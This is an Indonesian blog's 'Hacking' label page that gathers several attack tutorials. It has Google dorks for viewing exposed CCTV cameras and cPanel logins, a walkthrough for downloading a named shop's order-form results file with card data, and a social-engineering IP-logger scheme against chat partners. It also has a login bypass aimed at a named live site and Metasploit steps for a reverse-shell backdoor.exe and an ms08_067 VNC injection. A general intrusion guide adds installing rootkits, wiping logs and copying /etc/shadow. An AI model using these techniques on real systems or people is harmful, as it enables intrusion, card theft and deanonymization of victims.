Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Minggu, 24 November 2013

cara melihat cctv lewat google




https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYFhjhXgWyFIfYo_Ko2qhoD7HV2SrYBkkIRzMWgN5gJHX5Fqq_1gEHnjQfMo_Ar_Jaxo-6ja_5F7StJZcX-9zuWgBp3YmnYxx3pWYP6XgAElUFjYAIC55yYFq499EPjhdn9ERRV2yMFCMX/s320/download.png
cara melihat cctv lewat google

inurl:"ViewerFrame?Mode=" -inurl -intitle

itu keyword kita copas aja gan ke google... nah ntar kita bisa liat deh CCTV dari seluruh dunia..


versi lengkap..

code:

inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:"live view" intitle:axis
intitle:liveapplet
allintitle:"Network Camera NetworkCamera"
intitle:axis intitle:"video server"
intitle:liveapplet inurl:LvAppl
intitle:"EvoCam" inurl:"webcam.html"
intitle:"Live NetSnap Cam-Server feed"
intitle:"Live View / - AXIS"
intitle:"Live View / - AXIS 206M"
intitle:"Live View / - AXIS 206W"
intitle:"Live View / - AXIS 210″
inurl:indexFrame.shtml Axis
inurl:"MultiCameraFrame?Mode=Motion"
intitle:start inurl:cgistart
intitle:"WJ-NT104 Main Page"
intext:"MOBOTIX M1″ intext:"Open Menu"
intext:"MOBOTIX M10″ intext:"Open Menu"
intext:"MOBOTIX D10″ intext:"Open Menu"
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:"sony network camera snc-p1″
intitle:"sony network camera snc-m1″
site:.viewnetcam.com -www.viewnetcam.com
intitle:"Toshiba Network Camera" user login
intitle:"netcam live image"
intitle:"i-Catcher Console - Web Monitor"

by : http://svckid.blogspot.com/2011/07/live-hackertrik-melihat-cctv-dari.html

Carding U-File Credit Card Database Hacking


U-file Credit Card Database Hacking
This is a basic tutorial for hacking u-file database order forms
it will teach you how to get u-file cc database so lets start
open this link
http://www.miamionlineflowers.com/orderformterra_anniversary_eng.htm
as you can see its an order form page.
1st step : (all you need to do is to view the source) go to view tab
then click the page source or view source.after you have viewed the source the
2nd step : (prest ctrl f then find  u-file=) after you have found the “u-file=”
you will see this code  <!–webbot bot=”SaveResults” U-File=”_private/form_results.txt”
all you  need to get from the u-file is the “_private/form_results.txt”
3rd step :after getting the u-file this will be the last step just put the
u-file code besides the website like this.
http://www.miamionlineflowers.com/_private/form_results.txt
how to search in google : flowers orderform .htm | u-file=
so it will base on the string you use in searching for u-file database
here you go enjo

Cara Mengetahui IP Lawan via Chatting Facebook

Tutorial ini digunakan untuk mengetahui IP lawan dengan cara chat di FaceBook.
Hal ini bermanfaat untuk mengidentifikasi lawan melalui media Social Engineering.
Cara Mengetahui IP Lawan
Ada beberapa yang perlu disiapkan yaitu:
  1. Sebuah SERVER HOSTING yang bisa dipakai untuk menyimpan file logger.
  2. Sebuah LINK content / halaman menarik yang dapat digunakan untuk mengalihkan perhatian lawan.
  3. FILE LOGGER itu sendiri.
Instalasi FILE LOGGER kedalam CONTENT:

  1. Bikin sebuah artikel yang indah & menarik, sehingga akan banyak orang yang akan melihat.
  2. Kemudian buatlah file HTML, misalkan simpan difile: “galau.html“.
  3. Pada sela-sela code html tersebut, masukkanlah / inject code logger kedalam source htmlnya.
  4. Sesuaikan / edit alamat email untuk pengiriman hasil IP target di dalam code loggernya.
  5.  Kemudian upload file tersebut ke server hosting.
  6. Pastikan serverhosting memiliki kemampuan  pengiriman email seperti: SMTP / POP3
  7. Nanti file tersebut dibuka dengan: http://www.situsanda.com/galau.html
Cara yang dipakai disini adalah:
  1. Berusaha chatting dengan lembut dan baik dengan lawan chatting kita.
  2. Kemudian rayulah lawan untuk dapat meng-klik LINK yang sudah kita berikan tadi.
  3. Konfirmasikan ke lawan apakah sudah membaca link dengan cara menanyakan apa isi linknya.
  4. Link yang anda kirimkan adalah link logger yang tadi yaitu http://www.situsanda.com/galau.html
Setelah dapat dipastikan bahwa lawan kita sudah melihat link tersebut.
Maka, jreeengggggg.. kita lihat hasilnya. Itulah dia IP lawan chatting kita di Facebook.
Untul lebih jelas detailnya silakan ditonton disini:
File yang dibutuhkan, silakan download disini:

Selamat mencoba & semoga berhasil :)

Jumat, 22 November 2013

CPanel

Cara Mendapatkan Banyak CPanel Dengan Mudah


Lagi surfing di google, eh nemu yang beginian,, kocak! wkwkwkw ::D Yah, kali aja ada yang mau nyoba dan bisa dimanfaatin. :D yang ga berkenan, no komen aja :)
Pertama gunakan dork untuk mencari Cpanelnya 
Dork : inurl:":2082/login/?user="

Lalu masukkan dork ke box pencarian google, dan Enter.


Nah tinggal dibuka satu satu Cpanelnya yah :)


Maaf yah, kalo cuma begitu, lagi males ngapa2in :p Semoga bermanfaat aja :v

Bypass Login Tanpa Inspect Element

Assalamualaikum ^o^

Kali ini ane mau share nih sedikit tips Bypass Login tanpa main Insect Element ^o^, Oke langsung saja males ngetik banyak banyak wkwkkwk :D

Kalau belum tau cara manualnya kalian baca dulu disini

1. Masuk ke halama awal target



2. Disini Targetnya adalah https://www.niche-marketplace.net, nah caranya gampang kok, kalian tinggal masukin Exploit berikut :

Exploit : /admin/index.php?flag=2

Jadi tinggal tulis deh di addresbar kayak gini www.target.com/admin/index.php?flag=2
EX : https://niche-marketplace.net/admin/index.php?flag=2

3. Nanti penampakannya jadi kayak gini, tinggal klik login aja deh :D



4. Selamat anda sudah masuk ke website tersebut ^_^



5. Dah tuh tinggal di hajar aja wkwokowow caranya.

Baca disini,
Atau disana,
Atau dimana mana

wkokowkow

Sekian tutorial singkat dari ane :D

NB : jika di addresbar keluar tulisan flag=1 itu tandanya tidak bisa di kipulin wkwkwk

Sumber : indocyberarmy.blogspot.com/

Rabu, 18 September 2013

Remote Desktop Windows Menggunakan Metasploit Dengan Backdoor



Sebelumnya Telah dibahas apa itu metasploit dan bagaimana menggunakannya. Dan pada kesempatan kali ini akan membahas tentang bagaimana Remote Desktop Windows Menggunakan Metasploit dengan membuat sebuah backdoor.
Langkah – langkah yang akan dilakukan sebagai berikut :
1. Buat sebuah backdoor dengan cara
msfpayload windows/meterpreter/reverse_tcp lhost=192.168.100.1 lport=4444 x > backdoor.exe
Keterangan : Lhost adalah alamat dari laptop sendiri (IP address), untuk melihat ip address caranya ifconfig
2. Buka Metasploit, Masuk Ke Multi/Handler dengan cara :
use multi/handler
3. Setting Lport dan Lhost
set lport 4444
set lhost 192.168.100.1
4. Setting Payload
set payload windows/meterpreter/reverse_tcp
5. Jalankan Exploit
exploit
6. Copy Backdoor yang telah dibuat dan Pindahkan Ke PC target
7. Ketika virus telah berjalan maka kita telah bisa masuk ke PC target tersebut dengan ditandai perintah meterpreter>
Screenshot from 2013-04-02 09:53:10
8. Jalankan Perintah Remote Desktop
run vnc
Selamat Mencoba..

Remote Desktop Windows Menggunakan Metasploit Dengan Backdoor

          Pada kesempatan kali ini akan membahas tentang bagaimana Remote Desktop Windows Menggunakan Metasploit dengan membuat sebuah backdoor.
Langkah – langkah yang akan dilakukan sebagai berikut :

1. Buat sebuah backdoor dengan cara
msfpayload windows/meterpreter/reverse_tcp lhost=192.168.100.1 lport=4444 x > backdoor.exe

2. Buka Metasploit, Masuk Ke Multi/Handler dengan cara :
use multi/handler

3. Setting Lport dan Lhost
set lport 4444
set lhost 192.168.100.1

4. Setting Payloadset payload windows/meterpreter/reverse_tcp

5. Jalankan Exploit
exploit

6. Copy Backdoor yang telah dibuat dan Pindahkan Ke PC target

7. Ketika virus telah berjalan maka kita telah bisa masuk ke PC target tersebut dengan ditandai perintah meterpreter>
Screenshot from 2013-04-02 09:53:10

8. Jalankan Perintah Remote Desktop
run vnc


Selamat Mencoba..

Pengenalan Metasploit dan Tutorial Penetrasi Windows XP/Server 2003

Karena postingan saya tentang hacking sedikit, saya akan mencoba menambahnya. Kali ini kita akan mencoba membahas Metasploit. Bagi yang merasa sudah sering menggunakannya, silakan membaca postingan ini juga untuk cross check pengetahuan anda (^_^). Tutorial tentang Metasploit sangat banyak beredar, tapi saya akan coba membahasnya dari dasar sekali.



Metasploit adalah sebuah framework penetrasi jaringan komputer yang free dan open source, diciptakan oleh H.D. Moore pada tahun 2003 dan kini diakuisisi oleh Rapid7. Versi stabilnya sekarang ditulis menggunakan bahasa Ruby. Metasploit memiliki exploit database terbesar di dunia dan termasuk proyek pemrograman Ruby yang paling kompleks.



Istilah-istilah yang penting untuk kita pahami dalam pembelajaran awal Metasploit adalah :

             Vulnerability : kelemahan pada keamanan suatu sistem atau jaringan komputer yang memungkinkan penyusup melakukan pengambilalihan atau pencurian data.

             Exploit : adalah suatu kode yang membuat penyerang bisa memanfaatkan Vulnerability tadi untuk melakukan penyusupan.

              Payload : adalah kode program yang dimasukkan setelah exploit menemukan celah keamanan. Payload inilah yang sebenarnya bekerja dalam proses penetrasi jaringan.


Bagi pengguna Kali Linux atau Backtrack, Metasploit sudah terinstalasi dari awal. Bagi pengguna distro Linux lainnya dan Windows bisa mengunduhnya di http://www.metasploit.com/ dan menginstalasinya sesuai cara yang ada. Saya tidak akan membahas instalasi karena di ­link tersebut sudah dijelaskan dan tutorial instalasi banyak beredar. Saya menggunakan sistem operasi Windows 8 dan kira-kira inilah tampilan awal Metasploit saya :



                                                          Tampilan Awal Metasploit Console


Pertama, kita harus melakukan pengumpulan informasi sebanyak-banyaknya mengenai target. Tahapan ini disebut Footprinting dan Scanning. Banyak cara untuk melakukan ini, termasuk Social Engineering, tapi saya akan membahas yang berkaitan dengan Metasploit saja, yaitu cara NMap. Saya akan melakukan peretasan pada komputer target yang berada pada 1 LAN yang sama dengan saya. Prinsip ini sebenarnya tidak terlalu berbeda dengan peretasan pada komputer yang jauh (remote target) – hanya saja sedikit berbeda pada bagian Footprinting dan Scanning saja. Pada akhirnya, metode yang digunakan tetap sama. Untuk penyerangan remote target, koneksi internet yang stabil sangat diutamakan.



Untuk memeriksa apakah ada komputer aktif pada LAN yang sama, kita bisa menggunakan Advanced IP Scanner 1.5. Jika anda memiliki network scanner lain, bisa digunakan.

Scanning Network Lokal
           Dari gambar yang terlihat, selain saya dengan IP Address 192.168.137.1/24, terdapat 2 komputer lain yang sedang terhubung dengan LAN saya, yaitu 192.168.137.2/24 dan 192.168.137.3/24. Sekarang saya menetapkan bahwa target adalah 192.168.137.2/24. Lakukan port scanning dan OS fingerprinting menggunakan perintah nmap . Secara default, NMap melakukan port scanning dengan memanfaatkan TCP 3-Way Handshake. Tapi anda juga bisa melakukan berbagai tipe scanning seperti SYN Scan (-sS) yang lebih susah dideteksi firewall biasa, UDP Scan (-sU) untuk memeriksa port UDP target dan ACK Scan (-sA) untuk memeriksa port menggunakan paket TCP ACK. Masing-masing memiliki keunggulan tersendiri. Saya akan mencontohkan NMap menggunakan TCP Scan, ditambah OS fingerprinting sekaligus (-O).



Port Scanning dan OS Fingerprinting Menggunakan NMap


Nah, kini kita mengetahui bahwa port 135, 139 dan 445 terbuka dan OS yang digunakan kemungkinan Windows XP atau Server 2003. Kini kita harus memilih serangan yang sesuai dengan service port yang terbuka. Saya akan memilih port 445.



Kita akan memanfaatkan kelemahan netapi pada Server Message Block (SMB). Ketikkan :

 use exploit/windows/smb/ms08_067_netapi

show options




Disana bisa kita lihat opsi yang harus dimasukkan untuk menjalankan exploit. Mari kita masukkan RHOST dengan IP Address target kita :

 set RHOST 192.168.137.2


Berikutnya kita ingin mendapatkan display dari komputer target. Biasanya hacker pemula sangat suka dengan visualisasi (meskipun saya pribadi lebih suka command-line). Kita harus menginjeksikan payload VNC ke komputer target. Saya akan menggunakan injeksi VNC dengan reverse TCP.


set PAYLOAD windows/vncinject/reverse_tcp

show options




Isi nilai LHOST dengan IP Address komputer kita :

set LHOST 192.168.137.1



Untuk memulai ketikkan exploit dan tekan ENTER. Maka kita berhasil menjebol pertahanan target dan mendapatkan displaynya.






Tampilan Display Komputer Target Menggunakan VNC Injection 



               Penguasaan Metasploit harus melalui tahapan yang sangat pelan. Postingan ini hanyalah 1 contoh dari ribuan cara melakukan penetrasi menggunakan Metasploit. Kompleksitas modul ini sangat menarik untuk dipelajari dan untuk mempelajarinya, kita harus mengerti karakteristik tiap sistem operasi dan service yang ada dalam suatu jaringan komputer. Ingat, Metasploit bukan sebuah senapan mesin dengan banyak peluru yang bisa dihamburkan membabi-buta, melainkan sebuah sniper rifle yang hanya digunakan ketika kita tahu pasti apa saja yang dilakukan target.



Sekian dulu penjelasan dari saya, semoga bermanfaat.

Perintah - Perintah Dasar Pada CMD Untuk Hacking

          Command Prompt juga dapat disalah gunakan dalam dunia hacking, terutama untuk menerobos kelemahan website orang lain dari mulai mengubah permission folder, mengcopy file (bisa mungkin shell atau backdoor), serta pengendalian hanya dari komputer kita untuk mengontrol website tersebut , menakutkan bukan ? mungkin ini sedikit berbagi pengalaman saya dalam Command Prompt , yaitu perintah - perintah yang ada pada Command Prompt :

A
ARP : Address Resolution Protocol
Assoc : Ubah ekstensi file asosiasi
ASSOCIAT : Salah satu langkah asosiasi file
Attrib : Ubah atribut berkas

B
Bootcfg : Edit Windows boot settings
BROWSTAT : Dapatkan domain, info browser dan PDC

C
CACLS : Ubah file permissions
CALL : Panggil satu program batch yang lain
CD : Mengganti Directory – pindah ke Folder tertentu
Change : Ganti Terminal Server Session properties
CHKDSK : Check Disk – memeriksa dan memperbaiki masalah disk
CHKNTFS : Periksa sistem file NTFS
CHOICE : Menerima input keyboard ke sebuah file batch
CIPHER : Encrypt atau Decrypt file / folder
CleanMgr : Ototmatis membersihkan Temperatur file, recycle bin
CLEARMEM : Hapus kebocoran memori
CLIP : Salin STDIN ke Windows clipboard.
CLS : Menghapus layar (Clear The Screen)
CLUSTER : Windows Clustering
CMD : Start a new CMD shell
COLOR : Mengubah warna dari jendela CMD
COMP : Membandingkan isi dari dua file atau set file
COMPACT : Compress file atau folder pada partisi NTFS
Compress : Compress tunggal file pada partisi NTFS
CON2PRT : Menghubungkan atau memutuskan sambungan dengan Printer
CONVERT : Konversi FAT ke drive NTFS
COPY : Menyalin satu atau lebih file ke lokasi lain
CSCcmd : clien-side caching (Offline Files)
CSVDE : Impor atau Ekspor Active Directory data

D
DATE : Display atau mengatur tanggal
Defrag : Defragment hard drive
DEL : Menghapus satu atau lebih file
DELPROF : Hapus profil pengguna NT
DELTREE : Menghapus folder dan semua subfolder
DevCon : Device Manager Command Line Utility
DIR : Menampilkan daftar file dan folder
DIRUSE : Tampilkan penggunaan disk
DISKCOMP : Bandingkan isi dua floppy disk
Diskcopy : Salin isi dari satu disket ke yang lain
DISKPART : Disk Administrasi
DNSSTAT : DNS Statistik
DOSKEY : Edit baris perintah, ingat perintah, dan membuat macro
DSADD : Tambah User (komputer, group ..) ke direktori aktif
DSQUERY : Daftar item dalam direktori aktif
DSMOD : Ubah user (computer, group ..) di direktori aktif
DSRM : Hapus item dari Active Directory

E
ECHO : Menampilkan pesan di layar
ENDLOCAL : Akhir localisation perubahan lingkungan dalam file batch
ERASE : Menghapus satu atau lebih file
EVENTCREATE : Tambahkan pesan ke Windows event log
EXIT : Keluar dari skrip arus / rutin dan menetapkan errorlevel
EXPAND : uncompress file
Ekstrak : uncompress file CAB

F
FC : Bandingkan dua file
FIND : Mencari string teks dalam sebuah file
FINDSTR : Cari string dalam file
FOR / F : pengulangan perintah terhadap satu set file
FOR / F : pengulangan perintah terhadap hasil perintah lain
FOR : pengulangan perintah terhadap semua options Files, Directory, List
FORFILES : Proses Batch beberapa file
FORMAT : Format disk
FREEDISK : Periksa free disk space/disk yang tersisa (dalam bytes)
FSUTIL : File dan Volume utilitas
FTP : File Transfer Protocol
FTYPE : Tampilkan atau memodifikasi jenis file yang digunakan dalam asosiasi ekstensi file

G
GLOBAL : Display keanggotaan kelompok global
GOTO : Direct a batch program untuk melompat ke baris berlabel
GPUPDATE : Update pengaturan Kebijakan Grup

H
HELP : Online Help

I
ICACLS : Ubah file dan folder permissions
IF : kondisional melakukan perintah
IFMEMBER : Apakah pengguna saat ini dalam sebuah NT Workgroup
IPCONFIG : Configure IP

K
KILL : Remove program dari memori

L
LABEL : Edit disk label
LOCAL : Display keanggotaan kelompok-kelompok lokal
LOGEVENT : Menulis teks ke NT event viewer
Logoff : user log off
LOGTIME : log tanggal dan waktu dalam file

M
MAPISEND : Kirim email dari baris perintah
MBSAcli : Baseline Security Analyzer
MEM : Display penggunaan memori
MD : Buat folder baru
MKLINK : Buat link simbolik (linkd)
MODE : Mengkonfigurasi perangkat sistem
MORE : Display output, satu layar pada satu waktu
MOUNTVOL : mengelola volume mount point
MOVE : Pindahkan file dari satu folder ke yang lain
MOVEUSER : Pindahkan pengguna dari satu domain ke domain lainnya
MSG : mengirim pesan atau message
MSIEXEC : Microsoft Windows Installer
MSINFO : Windows NT diagnostics
MSTSC : Terminal Server Connection (Remote Desktop Protocol)
MUNGE : Cari dan Ganti teks dalam file (s)
MV : Copy in-menggunakan file

N
NET : Kelola sumber daya jaringan
NETDOM : Domain Manager
Netsh : Configure Network Interfaces, Windows Firewall & Remote akses
NETSVC : Command-line Service Controller
NBTSTAT : Tampilkan statistik jaringan (NetBIOS over TCP / IP)
NETSTAT : Display networking statistics (TCP / IP)
NOW : Tampilan saat ini Tanggal dan Waktu
NSLOOKUP : Nama server lookup
NTBACKUP : Backup folder ke tape
NTRIGHTS : Edit hak user account

P
PATH : Menampilkan atau menetapkan path pencarian untuk file executable
PATHPING : jejak jalur jaringan ditambah paket latensi dan kerugian
PAUSE : memenjarakan(suspend) pengolahan file batch dan menampilkan pesan
perms : Tampilkan izin untuk pengguna
PERFMON : Kinerja Monitor
PING : Menguji koneksi jaringan
POPD : Mengembalikan nilai sebelumnya dari direktori sekarang yang disimpan oleh PUSHD
PORTQRY : Tampilan status ports dan services
Powercfg : Mengkonfigurasi pengaturan daya
PRINT : Mencetak file teks
PRNCNFG : Display, mengkonfigurasi atau mengubah nama printer
PRNMNGR : Tambah, menghapus, daftar printer menetapkan printer default
PROMPT : Mengubah command prompt
PsExec : Proses Execute jarak jauh
PsFile : menampilkan file dibuka dari jarak jauh (remote)
PsGetSid : Menampilkan SID sebuah komputer atau pengguna
PsInfo : Daftar informasi tentang sistem
PsKill : proses mematikan berdasarkan nama atau ID proses
PsList : Daftar informasi rinci tentang proses-proses
PsLoggedOn : siapa saja yang log on (lokal atau melalui resource sharing)
PsLogList : catatan kejadian log
PsPasswd : Ubah sandi account
PsService : Melihat dan mengatur layanan
PsShutdown : Shutdown atau reboot komputer
PsSuspend : proses Suspend
PUSHD : Simpan dan kemudian mengubah direktori sekarang

Q
QGREP : Cari file(s) untuk baris yang cocok dengan pola tertentu

R
RASDIAL : Mengelola koneksi RAS
RASPHONE : Mengelola koneksi RAS
Recover : perbaikan file yang rusak dari disk yang rusak
REG : Registry = Read, Set, Export, Hapus kunci dan nilai-nilai
REGEDIT : Impor atau ekspor pengaturan registry
Regsvr32 : Register atau unregister sebuah DLL
REGINI : Ubah Registry Permissions
REM : Record comments (komentar) di sebuah file batch
REN : Mengubah nama file atau file
REPLACE : Ganti atau memperbarui satu file dengan yang lain
RD : Hapus folder (s)
RMTSHARE : Share folder atau printer
Robocopy : Copy File dan Folder secara sempurna
RUTE : Memanipulasi tabel routing jaringan
RUNAS : Jalankan program di bawah account pengguna yang berbeda
RUNDLL32 : Jalankan perintah DLL (add / remove print connections)

S
SC : Control Layanan
SCHTASKS : Jadwal perintah untuk dijalankan pada waktu tertentu
SCLIST : Tampilkan Layanan NT
SET : Display, set, atau menghapus variabel environment
SETLOCAL : Pengendalian environment visibilitas variabel
SETX : Set variabel environment secara permanen
SFC : Pemeriksa Berkas Sistem
SHARE : Daftar atau mengedit file share atau share print
SHIFT : Shift posisi digantikan parameter dalam sebuah file batch
SHORTCUT : jendela Buat shortcut (. LNK file)
SHOWGRPS : Daftar NT Workgroups seorang pengguna telah bergabung
SHOWMBRS : Daftar Pengguna yang menjadi anggota dari sebuah Workgroup
SHUTDOWN : Shutdown komputer
SLEEP : Tunggu untuk x detik
SLMGR : Software Licensing Management (Vista/2008)
SOON : Jadwal perintah untuk menjalankan dalam waktu dekat
SORT : Sort input
START : memulai sebuah program atau perintah dalam jendela terpisah
SU : Switch User
SUBINACL : Edit file dan folder Permissions, Kepemilikan dan Domain
SUBST : Associate jalan dengan huruf drive
Systeminfo : Daftar konfigurasi sistem

T
TASKLIST : Daftar menjalankan aplikasi dan services
TASKKILL : Hapus proses yang berjalan dari memori
TIME : Menampilkan atau mengatur waktu sistem
TIMEOUT : penundaan pemrosesan dari sebuah batch file
TITLE : Mengatur judul window untuk sesi cmd.exe
TLIST : daftar tugas dengan path lengkap
TOUCH : mengganti file timestamps
Tracert : Trace route ke sebuah remote host
TREE : tampilan grafis struktur folder
TYPE : Menampilkan isi dari file teks

U
USRSTAT : Daftar domain nama pengguna dan terakhir login

V
VER : Tampilkan versi informasi
VERIFY : Pastikan bahwa file sudah disimpan
VOL : Menampilkan sebuah label disk

W
WHERE : Menempatkan dan menampilkan file dalam sebuah pohon direktori
wHOAMI : Output UserName saat ini dan manajemen domain
WINDIFF : Bandingkan isi dua file atau set file
WINMSD : Sistem Windows diagnostik
WINMSDP : Sistem Windows diagnostik II
WMIC : Perintah WMI

X
XCACLS : Ubah file dan folder permissions
XCOPY : Menyalin file dan folder


         Segitu yang saya tahu , tinggal kita pilih mana yang bisa digunakan untuk perintah shell atau backdoor nya . Semoga bermanfaat artikel ini untuk anda.

Belajar Hacker Pemula !

Dalam suatu kesempatan, saya pernah melihat seorang auditor keamanan jaringan melalukan penetration test (pen-test) terhadap suatu sistem IT. Karena penasaran saya melihat sedikit2 cara penetration test yang dilakukan. Waktu itu saya belum banyak tahu tools apa aja yang digunakan, yang saya tau dia menggunakan tcpdump untuk menganalisis paket apa aja yang lewat, trus untuk men-scan beberapa host menggunakan Nessus. Ada salah satu aplikasi yang digunakan berbasis web yang terdapat kumpulan beberapa exploit. Waktu itu saya belum tahu aplikasi apa itu, yang saya ingat aplikasi itu menggunakan alamat http://127.0.0.1:55555, nah berbekal port 55555 saya mencari di google, dan ternyata itu adalah Metasploit Framework!.


Peristiwa itu menginspirasikan saya untuk mengenang masa-masa lalu ketika masih seneng2nya ngoprek dan belum ‘tercemar’ oleh DotA. Akhirnya sekarang saya ingin belajar ngoprek lagi, tp lebih fokus ke exploitnya saja. Tulisannya ini akan saya buat menjadi tiga bagian. Bagian pertama mengenai bagaimana salah satu cara umum yang dilakukan untuk menge-hack suatu system. Disini saya lebih menitikberatkan untuk hacking OS Windows XP, karena OS ini paling banyak dipakai orang. Bagian kedua lebih banyak ke teori mengenai exploit. Tapi karena mungkin akan sangat sulit dipahami (saya sendiri msh blm bisa membuat exploit sendiri), saya hanya menuliskan hasil terjemahan yang membahas apa itu dan cara kerja exploit. Sedangkan bagian terakhir merupakan praktek bagaimana mengelakukan penetration test menggunakan metasploit di Windows XP.

Bagian 1
*ini merupakan artikel lama mengenai salah satu cara umum yang dilakukan untuk hacking. (artikel ini jg di mirror oleh Negative a.k.a Jim Geovedi di sini). Langkah dibawah ini merupakan cara ‘standar’, hacking sebenarnya tidak harus selalu sesuai dengan ‘standar’ ini.
Hacking buat pemula
- by aCh

Artikel ini ditujukan bagi pemula, dan disusun oleh pemula. Ditulis untuk pengetahuan semata. Untuk temen2 yg udah ahli, sok aja dilewat, tapi dibaca juga gpp….
Apa sebenarnya hacking itu? klo menurut pengertian gue, hacking adalah ngoprek. Yup, hacking adalah ngoprek, mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, ‘ngudek-ngudek’ sampai ke ‘jeroannya’. Sesuatunya apa dong? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi gue kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, coba baca artikel sebelumnya (How to Become A Hacker). Di situ dijelasin bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol? belum tentu kan….

Pada artikel ini, gue pengen membagi pengalaman mengenai Hacking, walaupun sampai saat ini gue belum pernah nge-Hack ke server orang. Salah satu cara untuk mencoba simulasi Hack yaitu H3cky0uRs3lf! Buat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack Betulan… Apalagi klo di kost ada jaringan.
Pro dan Kontra Hacking

Pro
Kontra
Etika Hacking
Semua informasi adalah free
Jika semua informasi adalah free, maka tidak ada ladi privacy
Aspek Security
Intrusion adalah ilustrasi kelemahan sistem
Tidak perlu menjadi pencuri untuk menunjukkan pintu yang tidak terkunci
Idle Machines
Hacking hanya pada idle machines
idle machines milik siapa ?
science education
hanya membobol tapi tidak merusak
“hacker wannabe” berpotensi sangat besar untuk merusak
Okeh, sekarang waktunya melakukan aksi…

1. Fase Persiapan
~ Mengumpulkan informasi sebanyak-banyaknya
– Secara Aktif : – portscanning
– network mapping
– OS Detection
– application fingerprinting
Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat
– Secara Pasif : – mailing-list (jasakom, newbie_hacker, hackelink, dsb)
– via internet registries (informasi domain, IP Addres)
– Website yang menjadi terget

2. Fase Eksekusi
~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.org, milw0rm, milis bugtraq, atau mencari lewat #IRC).

~ Mengekspolitasi Vulnerability Holes

- compile eksploit -> local host ->
$gcc -o exploit exploit.c
$./exploit

# hostname (# tanda mendapatkan akses root)
remote host -> $gcc -o exploit exploit.c
$./exploit -t www.target.com

# (klo beruntung mendapatkan akes root)
~ Brute Force
– Secara berulang melakukan percobaan otentifikasi.
– Menebak username dan password.
– Cracking password file
~ Social Engineering
– Memperdayai user untuk memeberi tahu Username dan password
– Intinya ngibulin user….

3. Fase Setelah Eksekusi
~ Menginstall backdoor, trojans, dan rootkit
~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin
~ Menyalin /etc/passwd atau /etc/shadow/passwd

Nah, intinya seh cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraketekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot. Saran gue, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Kalaupun pun ga terhubung ke jaringan, kita masih bisa menggunakan Virtual Machine menggunakan VMWare seperti yang nanti akan dibahas pada bagian 3!
Referensi :

-Hacking and Defense, Jim Geovedi, negative@magnesium.net
-Network Defense, Jim Geovedi, negative@magnesium.net

TUTORIAL HACKER PEMULA !

Kumpulan Tutorial untuk Hacking


Oke kali ini saya akan share beberapa tutorial hacking untuk pemula dan sangat mendasar, tutorial ini bisa digunakan oleh hacker awam sekalipun maupun hacker mahir atau kelas atas.

Oh ya tapi dalam tutorial ini bahasa yang digunakan adalah bahasa inggris, jadi kita harus bisa mengerti sedikit bahasa inggris ok :)

Tutorial hacking ini ukurannya sangat kecil karena bentuknya .txt dan saya kompres menggunakan winrar :)

beberapa tutor yang disertakan yaitu:
- find hole
- ftp bounce
- ip hijack
- nt exploits
- ip address forgery
- dll

buat yang mau download bisa disini :
part 1 : download
part 2 : download
part 3 : download